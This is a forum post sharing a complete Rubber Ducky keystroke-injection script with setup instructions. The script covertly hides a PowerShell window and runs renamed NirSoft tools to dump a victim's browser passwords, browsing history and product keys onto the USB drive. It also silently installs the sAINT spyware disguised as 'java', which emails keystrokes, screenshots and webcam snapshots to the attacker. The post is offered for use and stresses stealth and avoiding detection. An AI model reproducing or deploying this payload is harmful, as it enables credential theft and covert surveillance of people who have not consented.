Jump to content

Stealer for Rubber Ducky twin


W1L5T3R

Recommended Posts

Standing on the shoulders of giants on this one :) shout out to them

This will do the following:

1. Move the powershell dialogue  (small size) to the bottom of the screen 

2. steal all browser passwords and dump them onto the rubber ducky

3. steal all browser history and dump them onto the rubber ducky

4. steal product keys and dump them onto the rubber ducky (everything installed which needs a product key it will dump)

5. silently install sAINT and then dump keystrokes, screenshot and webcam snap to your email (disguised as java and not detected)

All of this from plugging in the rubber duck to removing is within 10 seconds. 

I just adjusted the coding a little and got it running quickly and silently.

to make sAINT work - use a linux machine (kali or parrot or whatever) and download sAINT and compile the .exe... rename the .exe to whatever you like and store on the rubber ducky.

download browser history, browser password viewer and product key viewer from here: https://www.nirsoft.net/

rename them to whatever you like and use encoder to make the inject.bin 

here is a copy of the script:

DELAY 300
REM CLOSES ALL WINDOWS THAT ARE OPEN 
GUI d
DELAY 200
REM OPEN RUN BOX 
GUI r
DELAY 100
REM OPENS POWERSHELL 
STRING powershell.exe
DELAY 100
ENTER
DELAY 100
REM CHANGES TERMINAL TO SMALL BOX
STRING MODE CON:COLS=18 LINES=1
DELAY 100
ENTER
DELAY 100
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM SETS THE PATH FOR THE USB DRIVE AND CHANGES LABEL TO _  (underscore)
STRING $usbPath = GET-WMIObject Win32_Volume | ? { $_.label -eq '_' } | select name
ENTER
DELAY 100
REM CD INTO USB DRIVE 
STRING cd $usbPath.name
ENTER
REM RUNS BROWSER PASS STEALER SILENTLY AND STORES TEXT FILE ON USB 
STRING ./WinUpdate1 /stext win1log.txt   <<<<<<renamed to WinUpdate1>>>>>>
DELAY 100
ENTER
REM RUNS BROWSER HISTORY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE
STRING ./WinUpdate2 /stext win2log.txt    <<<<<<<renamed to WinUpdate2>>>>>
DELAY 100
ENTER
REM RUNS PRODUCT KEY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE
STRING ./PKV /stext pkvlog.txt    <<<<<<renamed to PKV>>>>>>
DELAY 100
ENTER
DELAY 200
REM RUNS SAINT LOGGER SILENTLY AND REPORTS TO YOUR EMAIL SCREENSHOT AND KEYSTROKES PLUS WEBCAM SNAP
STRING ./java      <<<<<I renamed the sAint.exe to java>>>>>
DELAY 100
ENTER
STRING exit
ENTER

 

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...